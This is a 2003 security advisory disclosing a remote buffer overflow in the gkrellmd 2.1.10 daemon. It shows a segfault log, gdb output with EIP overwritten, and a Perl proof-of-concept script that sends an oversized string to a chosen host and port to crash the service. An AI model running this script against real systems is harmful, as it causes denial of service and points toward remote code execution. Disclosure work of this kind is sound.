gkrellmd

`Gkrellmd 2.1.10 remote exploit (buffer overflow)  
date: 22-06-2003  
author: dodo [[email protected]]  
aurhor-url: https://darkwired.ath.cx/  
  
- Description:  
Gkrellm is a GTK system monitoring utility, the latest version comes with a daemon.  
It's a great peace of software, however the daemon needs more secure code.  
gkrellm/gkrellmd: http://www.gkrellm.net/  
  
- Exploitation:  
when someone sends data to the gkrellmd, gkrellmd uses buffers to store  
this data, however, it doesn't check for the maximum buffersize (128bytes).  
This could result in remote executing of code and crashing the daemon.  
  
- Details:  
  
verbose gkrellmd output:  
  
cyride-bash# gkrellmd -P 661 -V  
update_HZ=3  
connect string from client: gkrellm 2.1.10  
gkrellmd accepted client: dwop.darkwired.da.ru:43755  
received 141 bytes: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
Segmentation fault (core dumped)  
  
debugger output (eip):  
  
cyride-bash# gdb gkrellmd gkrellmd.core  
(gdb) info reg  
eip 0x41414141 0x41414141  
  
  
- Proof of concept:  
  
gkrellmcrash.pl:  
  
#!/usr/bin/perl -s  
use IO::Socket;  
#  
# proof of concept code  
# tested: grkellmd 2.1.10  
#  
  
  
  
if(!$ARGV[0] || !$ARGV[1])  
{ print "usage: ./gkrellmcrash.pl <host> <port>\n"; exit(-1); }  
  
$host = $ARGV[0];  
$port = $ARGV[1];  
$exploitstring = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";  
  
$socket = new IO::Socket::INET  
(  
Proto => "tcp",  
PeerAddr => $host,  
PeerPort => $port,  
);  
  
die "unable to connect to $host:$port ($!)\n" unless $socket;  
  
print $socket "gkrellm 2.1.10\n"; #tell the daemon wich client we have  
sleep(1);  
print $socket $exploitstring;  
  
close($socket);  
  
- Vendor Response:  
vendor contacted on 22-06-2003  
http://www.gkrellm.net/`